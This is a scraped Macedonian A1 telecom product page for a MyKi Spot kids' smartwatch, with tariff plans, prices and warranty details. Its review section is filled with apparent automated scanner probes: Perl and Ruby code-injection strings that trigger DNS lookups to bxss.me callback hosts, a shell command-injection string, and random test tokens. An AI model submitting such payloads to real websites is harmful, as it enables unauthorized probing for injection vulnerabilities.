Мобилна
Ограничени количини
достапен
онлајн недостапен
боја: Black

Достапно во ограничени количини

достапен

онлајн недостапен

Тарифа
A1 Myki Pet
Промени тарифа
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.
Цена

499 ден.

Бесплатна достава

Сакате да знаете кога ќе има залиха?

Ограничени количини
достапен
онлајн недостапен

A1 Nova XS

499 ден./мес.

 
 
4GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 
  
 
 
  
  
 
 
  

Цена за MyKi MyKi Spot

1.999 ден.
Одбери

A1 Nova S

899 ден./мес.

10GB
 
20GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за MyKi MyKi Spot

0 ден.
Одбери

A1 Nova M

1.099 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за MyKi MyKi Spot

0 ден.
Одбери

A1 Nova L

1.299 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за MyKi MyKi Spot

0 ден.
Одбери
Одберете тарифа
Враќање на производ
Бесплатна достава
Секогаш во добивка
Безбедно плаќање

MyKi MyKi Spot

Цена на уредот во тарифа
Тарифа
Времетраење на договор
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.

A1 Nova XS

499 ден./мес.

 
 
4GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 
  
 
 
  
  
 
 
  

Цена за MyKi MyKi Spot

1.999 ден.
Одбери

A1 Nova S

899 ден./мес.

10GB
 
20GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за MyKi MyKi Spot

0 ден.
Одбери

A1 Nova M

1.099 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за MyKi MyKi Spot

0 ден.
Одбери

A1 Nova L

1.299 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за MyKi MyKi Spot

0 ден.
Одбери

A1 Nova XL

1.599 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
100 минути
 
меѓународни разговори 
  
 
 
  
  

Цена за MyKi MyKi Spot

0 ден.
Одбери

A1 Myki

399 ден./мес.

250MB
 
национален интернет 
за часовникот 
500 минути
 
мрежата на А1 
  
50 минути
 
кон други национални мрежи 
  
50 SMS
 
кон сите мрежи 
  

Цена за MyKi MyKi Spot

3.499 ден.
Одбери

A1 Myki Pet

199 ден./мес.

Препорачана тарифа
250MB
 
национален интернет 
за часовникот 
500 минути
 
кон мрежата на А1 
  
50 минути
 
кон други национални мрежи 
  

Цена за MyKi MyKi Spot

499 ден.
Одбрано

A1 Senior

299 ден./мес.

 
 
500MB
 
национален интернет 
Неограничено
 
минути кон A1 
  
50
 
Минути кон останати нац. 
мрежи (фиксни/мобилни) 
50
 
SМЅ кон сите 
национални мрежи 

Цена за MyKi MyKi Spot

2.999 ден.
Одбери
Основна цена
3.999денари
Припејд
4.499денари
Цена само за уред
4.499денари

MyKi MyKi Spot

Што има во кутијата?
  Основни карактеристики
   Детални карактеристики
   Гаранција и сервис
   месецигаранција од производител
   Овластен сервисер за овој уред

   Доколку имате потреба од сервис за Вашиот MyKi MyKi Spot, контактирајте го овластениот сервисер.

   MyKi MyKi Spot

   Оценка од корисници

   Има вкупно 10 рецензии за овој уред

   4
   6
   0
   0
   0
   4.4
   '.gethostbyname(lc('hitxf'.'mmavhmyse1265.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(87).chr(112).chr(88).'
   21.01.2023

   Дали Ви помогна оваа рецензија?
   ".gethostbyname(lc("hitpy"."wsoebxeya3a51.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(87).chr(104).chr(87)."
   21.01.2023

   Дали Ви помогна оваа рецензија?
   |echo ndilmr$()\ dzjfal\nz^xyu||a #' |echo ndilmr$()\ dzjfal\nz^xyu||a #|" |echo ndilmr$()\ dzjfal\nz^xyu||a #
   21.01.2023

   Дали Ви помогна оваа рецензија?
   zFPWdwPk
   21.01.2023

   Дали Ви помогна оваа рецензија?
   zFPWdwPk
   21.01.2023

   Дали Ви помогна оваа рецензија?
   zFPWdwPk
   21.01.2023

   Дали Ви помогна оваа рецензија?
   "+"A".concat(70-3).concat(22*4).concat(117).concat(75).concat(122).concat(85)+(require"socket" Socket.gethostbyname("hiteu"+"lzgjumwwb8de7.bxss.me.")[3].to_s)+"
   21.01.2023

   Дали Ви помогна оваа рецензија?
   '+'A'.concat(70-3).concat(22*4).concat(121).concat(69).concat(122).concat(87)+(require'socket' Socket.gethostbyname('hitcm'+'tndocfdd47906.bxss.me.')[3].to_s)+'
   21.01.2023

   Дали Ви помогна оваа рецензија?
   zFPWdwPk
   21.01.2023

   Дали Ви помогна оваа рецензија?
   zFPWdwPk
   21.01.2023

   Дали Ви помогна оваа рецензија?